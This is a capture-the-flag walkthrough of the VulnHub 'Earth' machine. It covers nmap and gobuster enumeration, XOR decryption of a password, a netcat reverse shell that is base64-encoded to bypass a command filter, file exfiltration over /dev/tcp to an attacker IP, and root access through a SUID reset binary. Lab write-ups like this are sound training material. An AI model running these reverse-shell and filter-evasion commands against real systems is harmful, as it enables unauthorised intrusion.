Description:-
Earth is an easy box though you will likely find it more challenging than “Mercury” in this series and on the harder side of easy, depending on your experience. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware.
Setup Vulhub Machine: –
- First, we have to Download the Mirror image from VulnHub. (https://download.vulnhub.com/theplanets/Earth.ova)
- Open Virtual Box and click on Import and then select the downloaded file.
- Once You import successfully, You can now set the interface to Vbox guest addition. This process will help you in the Enumeration phase.
The Walkthrough: –
Step 1:- (Enumeration)
find out the target IP address using NetDiscover.
┌─(rootharsh㉿kali)-[~]
└─$ sudo netdiscover -i eth0
From the Scanning result, we have discovered our target IP address i.e., 192.168.56.105.
We have discovered the IP address, so let’s perform a network scan to detect what ports are open is already known as an essential part of the enumeration process. This offers us the opportunity to better understand the attacking surface and design targeted attacks. As in most cases, we are going to use the famous Nmap tool:
- -sC: perform a script scan using the default set of scripts,
- -sV: enables version detection, which will detect what versions are running on what port.
- -v: Increase the verbosity level (use -vv or more for greater effect),
- -T4: Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network.
┌──(rootharsh㉿kali)-[~]
└─$ nmap -sC -sV -v -T4 192.168.56.105
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 11:56 IST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating Ping Scan at 11:56
Scanning 192.168.56.105 [2 ports]
Completed Ping Scan at 11:56, 0.00s elapsed (1 total hosts)
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Initiating Connect Scan at 11:56
Scanning 192.168.56.105 [1000 ports]
Discovered open port 22/tcp on 192.168.56.105
Discovered open port 80/tcp on 192.168.56.105
Discovered open port 443/tcp on 192.168.56.105
Completed Connect Scan at 11:56, 6.13s elapsed (1000 total ports)
Initiating Service scan at 11:56
Scanning 3 services on 192.168.56.105
Completed Service scan at 11:56, 12.06s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.56.105.
Initiating NSE at 11:56
Completed NSE at 11:56, 1.26s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 1.26s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Nmap scan report for 192.168.56.105
Host is up (0.0015s latency).
Not shown: 985 filtered tcp ports (no-response), 12 filtered tcp ports (host-unreach)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 5b2c3fdc8b76e9217bd05624dfbee9a8 (ECDSA)
|_ 256 b03c723b722126ce3a84e841ecc8f841 (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Issuer: commonName=earth.local/stateOrProvinceName=Space
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-12T23:26:31
| Not valid after: 2031-10-10T23:26:31
| MD5: 4efa65d21a9e07184b5441da3712f187
|_SHA-1: 04db5b29a33f8076f16b8a1b581d6988db257651
|_http-title: Test Page for the HTTP Server on Fedora
| http-methods:
| Supported Methods: POST OPTIONS HEAD GET TRACE
|_ Potentially risky methods: TRACE
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
NSE: Script Post-scanning.
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.08 seconds
┌──(rootharsh㉿kali)-[~]
└─$ From the Nmap output, we have found three open ports:-
Port 22(OpenSSH 8.6 (protocol 2.0)),
Port 80 (Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)),
and Port 443 (Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)).
From the SSL SSL Protocol (Port 443) we found two hostnames:-
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Issuer: commonName=earth.local/stateOrProvinceName=SpaceFrom the Nmap output, we have found three open ports
ADD two hostnames to /etc/hosts file.
┌──(rootharsh㉿kali)-[~]
└─$ sudo nano /etc/hosts
Open Browser, and then visit the following Link:
If you scroll down, you can find few encrypted messages that are signed with Message Key:
Navigating any hidden or hardly accessible directories and pages, and that is through dir busting (Directory Busting). Using gobuster as our tool of choice, we can use the following switches for the script to get the fastest and most accurate results.
- dir : Uses directory/file enumeration mode.
- -u : The target URL.
- -w : Path to the wordlist.
┌──(rootharsh㉿kali)-[~]
└─$ gobuster dir -u http://earth.local/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://earth.local/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/03/16 14:39:40 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 0] [--> /admin/]
/cgi-bin/ (Status: 403) [Size: 199]
Progress: 4434 / 4615 (96.08%)
===============================================================
2023/03/16 14:39:47 Finished
===============================================================
┌──(rootharsh㉿kali)-[~]
└─$We might get lucky and find an admin page that may help us find leverage against the target in combination with the credentials.
If you click on Login then it will redirect to a Login Page:
Now we don’t have any credentials to get login access, so we have to find out the credentials.
After few research, I find out that the second DNS is a Test Site that may give us any clue:
Open Browser and Visit this site:
- Remember: Access this site with SSL (HTTPS)
https://terratest.earth.local/
Again, we have to find out Active directories using gobuster.
┌──(rootharsh㉿kali)-[~]
└─$ gobuster dir -u https://terratest.earth.local/ -k -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://terratest.earth.local/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/03/18 12:48:04 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 199]
/.htaccess (Status: 403) [Size: 199]
/.htpasswd (Status: 403) [Size: 199]
/cgi-bin/ (Status: 403) [Size: 199]
/index.html (Status: 200) [Size: 26]
/robots.txt (Status: 200) [Size: 521]
Progress: 4563 / 4615 (98.87%)
===============================================================
2023/03/18 12:48:38 Finished
===============================================================
┌──(rootharsh㉿kali)-[~]
└─$After successful Directory Busting, we found an interesting file (i.e.robots.txt).
And again we discover another interesting file (i.e., /testingnotes.*).
https://terratest.earth.local/testingnotes.txt
It seems to be some developer/admin who may be left Note on the network.
From the note, we can confirm that the encryption algorithm is XOR and the key might be from testdata.txt. Likewise, the username for the admin portal is terra. Also, the admin portal is /admin on the other website.
https://terratest.earth.local/testdata.txt
It seems like this is what was used to encrypt the first few messages we see on the earth.local page. Let’s try to decode the messages on that page using this information. Let’s Decrypt the Message using Cyberchef.
(Learn more: https://github.com/gchq/CyberChef)
Visit Cyberchef:-
The Messages are in the form of Hexadecimal and we have to decrypt to XOR.
Drag and drop the From Hex and XOR Operations to Recipe:
Input the decrypt Message one by one and also paste the key that we have found from “testdata.txt“.
- Remember: The Key is set to UTF-8.
It seems that we get earthclimatechangebad4humans as a repeating string. It may be the password of the user terra.
Step 2:- (Foothold)
Let’s try to log in with the user terra. The login panel we have found in previous.
After successful Login we got a CLI command line interface. Let’s try with a simple command:
Our assumption was true and we got a Command Output. So let’s try to get a Remote command line interface:
nc -e /bin/sh 192.168.56.102 4444
We got a Warning, which means we can not get a Remote connection by using the simplest method:
We can bypass this by converting it to its decimal notation. Or, we can encode the command in the base64 format.
Open terminal and input below command:
┌──(rootharsh㉿kali)-[~]
└─$ echo 'nc -e /bin/sh 192.168.56.102 4444' | base64
bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjU2LjEwMiA0NDQ0Cg==
┌──(rootharsh㉿kali)-[~]
└─$Now copy this output and switch back to Browser paste with base64 decode command, Before that make sure that Netcat is started.
┌──(rootharsh㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...Now copy the below command and paste to CLI Command Line interface:
echo '{Decoded script}' | base64 -d | bashecho 'bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjU2LjEwMiA0NDQ0Cg==' | base64 -d | bashThe Netcat start to Listening on Port 4444 from a UNKNOWN source.
┌──(rootharsh㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.105] 42698
python -c 'import pty;pty.spawn("bin/bash")'
bash-5.1$ whoami
whoami
apache
bash-5.1$We have successfully foothold The Planet: Earth but we don’t have any Administrator Privileges.
Step 3:- (Privilege Escalation)
Let’s check our SUIDs and see if there’s anyway we can escalate to root.
bash-5.1$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1We found an reset_root script that may help us to gain root access. Let me run this script:
bash-5.1$ file /usr/bin/reset_root
file /usr/bin/reset_root
/usr/bin/reset_root: setuid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=4851fddf6958d92a893f3d8042d04270d8d31c23, for GNU/Linux 3.2.0, not stripped
bash-5.1$ When I ran the script, I got the error message RESET FAILED.
Next we have to modify the script so move reset_root script to Local desktop using below command:
bash-5.1$ cat /usr/bin/reset_root > /dev/tcp/192.168.56.102/3333
cat /usr/bin/reset_root > /dev/tcp/192.168.56.102/3333
bash-5.1$ Before executing the upper command you have to open a new terminal and start another listener.
┌──(rootharsh㉿kali)-[~]
└─$ nc -lvnp 3333 > reset_root
listening on [any] 3333 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.105] 39780After that we have already downloaded reset_root file to local storage. Let’s trace using Itrace:
┌──(rootharsh㉿kali)-[~]
└─$ chmod +x reset_root
┌──(rootharsh㉿kali)-[~]
└─$ ltrace ./reset_root
puts("CHECKING IF RESET TRIGGERS PRESE"...CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", 0) = -1
access("/dev/shm/Zw7bV9U5", 0) = -1
access("/tmp/kcM0Wewe", 0) = -1
puts("RESET FAILED, ALL TRIGGERS ARE N"...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
+++ exited (status 0) +++
┌──(rootharsh㉿kali)-[~]
└─$From the output, we mark that three files are missing on the shown locations. Therefore, we have to create those files on the target. Lastly, when I ran the binary, it changed the password of the root.
bash-5.1$ touch /dev/shm/kHgTFI5G
touch /dev/shm/kHgTFI5G
bash-5.1$ touch /dev/shm/Zw7bV9U5
touch /dev/shm/Zw7bV9U5
bash-5.1$ touch /tmp/kcM0Wewe
touch /tmp/kcM0Wewe
bash-5.1$Let’s execute the reset_root file again:
bash-5.1$ reset_root
reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
bash-5.1$Reset successful and the password of root set to Earth. Let’s switch back to root user and find out the flags:
bash-5.1$ su root
su root
Password: Earth
[root@earth /]# cd /root
cd /root
[root@earth ~]# ls
ls
anaconda-ks.cfg root_flag.txt
[root@earth ~]# cat root_flag.txt
cat root_flag.txt
_-o#&&*''''?d:>b\_
_o/"`'' '',, dMF9MMMMMHo_
.o&#' `"MbHMMMMMMMMMMMHo.
.o"" ' vodM*$&&HMMMMMMMMMM?.
,' $M&ood,~'`(&##MMMMMMH\
/ ,MMMMMMM#b?#bobMMMMHMMML
& ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
?$. :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
| |MMMMMMMMMMMMMMMMMMMMbMH' T,
$H#: `*MMMMMMMMMMMMMMMMMMMMb#}' `?
]MMH# ""*""""*#MMMMMMMMMMMMM' -
MMMMMb_ |MMMMMMMMMMMP' :
HMMMMMMMHo `MMMMMMMMMT .
?MMMMMMMMP 9MMMMMMMM} -
-?MMMMMMM |MMMMMMMMM?,d- '
:|MMMMMM- `MMMMMMMT .M|. :
.9MMM[ &MMMMM*' `' .
:9MMk `MMM#" -
&M} ` .-
`&. .
`~, . ./
. _ .-
'`--._,dd###pp=""'
Congratulations on completing Earth!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_b0da9554d29db2117b02aa8b66ec492e]
[root@earth ~]#